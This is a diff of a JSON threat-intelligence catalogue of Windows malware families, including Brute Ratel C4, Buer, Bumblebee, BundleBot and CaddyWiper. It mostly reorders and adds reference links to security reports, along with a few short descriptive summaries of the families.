 "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later",
- "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html",
- "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/"
+ "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html"
 ],
 "synonyms": [],
 "type": []
@@ -16532,22 +17324,26 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4",
- "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb",
+ "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html",
 "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
- "https://0xdarkvortex.dev/hiding-in-plainsight/",
- "https://protectedmo.de/brute.html",
- "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA",
- "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
- "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
- "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/",
- "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/",
 "https://www.youtube.com/watch?v=a7W6rhkpVSM",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA",
+ "https://0xdarkvortex.dev/hiding-in-plainsight/",
 "https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities",
- "https://blog.spookysec.net/analyzing-brc4-badgers/",
- "https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/",
 "https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/",
- "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf",
+ "https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ 
"https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/",
+ "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/",
+ "https://blog.spookysec.net/analyzing-brc4-badgers/",
+ "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
+ "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb",
+ "https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/",
+ "https://twitter.com/MichalKoczwara/status/1652067563545800705",
+ "https://protectedmo.de/brute.html"
 ],
 "synonyms": [
 "BruteRatel"
@@ -16575,10 +17371,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
- "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
 "https://www.secureworks.com/research/threat-profiles/bronze-palace",
- "https://github.com/nccgroup/Royal_APT",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
+ "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://github.com/nccgroup/Royal_APT"
 ],
 "synonyms": [],
 "type": []
@@ -16618,38 +17414,38 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer",
+ "https://twitter.com/StopMalvertisin/status/1182505434231398401",
+ "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
+ "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
+ "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
+ "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
+ "http://www.secureworks.com/research/threat-profiles/gold-symphony",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
+ "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
+ 
"https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
 "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "http://www.secureworks.com/research/threat-profiles/gold-symphony",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://twitter.com/StopMalvertisin/status/1182505434231398401",
- "https://blog.minerva-labs.com/stopping-buerloader",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
 "https://blog.group-ib.com/prometheus-tds",
- "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
- "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
- "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
 "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ 
"https://blog.minerva-labs.com/stopping-buerloader",
 "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html"
 ],
 "synonyms": [
 "Buerloader",
@@ -16665,8 +17461,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buffetline",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f"
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045f",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/"
 ],
 "synonyms": [],
 "type": []
@@ -16675,7 +17471,7 @@
 "value": "BUFFETLINE"
 },
 {
- "description": "",
+ "description": "According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch",
@@ -16692,18 +17488,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap",
- "https://malware-research.org/carbanak-source-code-leaked/",
- "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
- "https://www.scythe.io/library/threatthursday-buhtrap",
- "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
- "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
- "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/",
+ "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/",
 "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
 "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
 "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
- "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
+ "https://malware-research.org/carbanak-source-code-leaked/",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
- "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/"
+ "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
+ "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
+ "https://www.scythe.io/library/threatthursday-buhtrap",
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
+ "https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/"
 ],
 "synonyms": [
 "Ratopak"
@@ -16718,60 +17514,66 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee",
- "https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader",
- "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://www.youtube.com/watch?v=pIXl79IPkLI",
- "https://www.youtube.com/watch?v=JoKJNfLAc0Y",
 "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/",
- "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
- "https://blog.krakz.fr/articles/bumblebee/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
- "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/",
- "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blog.cerbero.io/?p=2617",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://threathunt.blog/bzz-bzz-bumblebee-loader",
- "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
- "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
- "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
- "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
- "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign",
- "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/",
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
- "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
- "https://twitter.com/threatinsight/status/1648330456364883968",
- "https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming",
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
- "https://community.riskiq.com/article/0b211905/description",
- "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
 "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
- "https://isc.sans.edu/diary/28636",
- "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
 "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
+ "https://community.riskiq.com/article/0b211905/description",
 "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
- "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://isc.sans.edu/diary/rss/28636",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
 "https://isc.sans.edu/diary/rss/28664",
- "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://www.youtube.com/watch?v=JoKJNfLAc0Y",
+ "https://blog.cerbero.io/?p=2617",
+ "https://www.botconf.eu/wp-content/uploads/formidable/2/2023_4889_DESOUZA.pdf",
+ "https://0xtoxin.github.io/malware%20analysis/Bumblebee-DocuSign-Campaign/",
+ "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
+ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
+ "https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
 "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
 "https://twitter.com/ESETresearch/status/1577963080096555008",
- "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf"
+ "https://isc.sans.edu/diary/rss/28636",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://twitter.com/threatinsight/status/1648330456364883968",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://blog.krakz.fr/articles/bumblebee/",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://threathunt.blog/bzz-bzz-bumblebee-loader",
+ "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
+ "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/",
+ "https://twitter.com/Intrinsec/status/1699779830294970856",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader",
+ "https://isc.sans.edu/diary/28636",
+ "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf"
 ],
 "synonyms": [
 "COLDTRAIN",
@@ -16788,8 +17590,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner",
- "https://www.f-secure.com/weblog/archives/00002249.html",
- "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
+ "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf",
+ "https://www.f-secure.com/weblog/archives/00002249.html"
 ],
 "synonyms": [
 "0zapftis",
@@ -16800,18 +17602,31 @@
 "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47",
 "value": "Bundestrojaner"
 },
+ {
+ "description": "Bundlebot is an info stealer that abuses the single-file dotnet bundle which operates as a self-contained executable that does not require any preinstalled dotnet runtime version. Bundlebot functionality targets a wide variety of data including the victim's system information, browser data, telegram data, discord token, Facebook account information, and screenshots. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundlebot",
+ "https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d63eb20b-6a3f-4d96-a52d-8395f1868389",
+ "value": "BundleBot"
+ },
 {
 "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/",
- "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
- "http://malware-traffic-analysis.net/2017/05/09/index.html",
 "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
- "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/"
+ "http://malware-traffic-analysis.net/2017/05/09/index.html",
+ "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
+ "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
+ "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/"
 ],
 "synonyms": [],
 "type": []
@@ -16854,13 +17669,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
 "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
 "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/"
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
 ],
 "synonyms": [],
 "type": []
@@ -16897,46 +17712,47 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper",
- "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
- "https://twitter.com/silascutler/status/1513870210398363651",
- "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
- "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
- "https://n0p.me/2022/03/2022-03-26-caddywiper/",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
 "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://cybersecuritynews.com/destructive-data-wiper-malware/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://cert.gov.ua/article/39518",
- "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
- "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine",
- "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
- "https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/",
- "https://cert.gov.ua/article/3718487",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://twitter.com/ESETresearch/status/1503436420886712321",
+ "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
 "https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html",
- "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
+ "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
 "https://twitter.com/HackPatch/status/1503538555611607042",
- "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
- "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://twitter.com/silascutler/status/1513870210398363651",
 "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
+ "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
+ "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://cert.gov.ua/article/3718487",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
+ "https://www.mandiant.com/resources/blog/gru-disruptive-playbook",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
+ "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
 "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
 "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://twitter.com/ESETresearch/status/1503436420886712321",
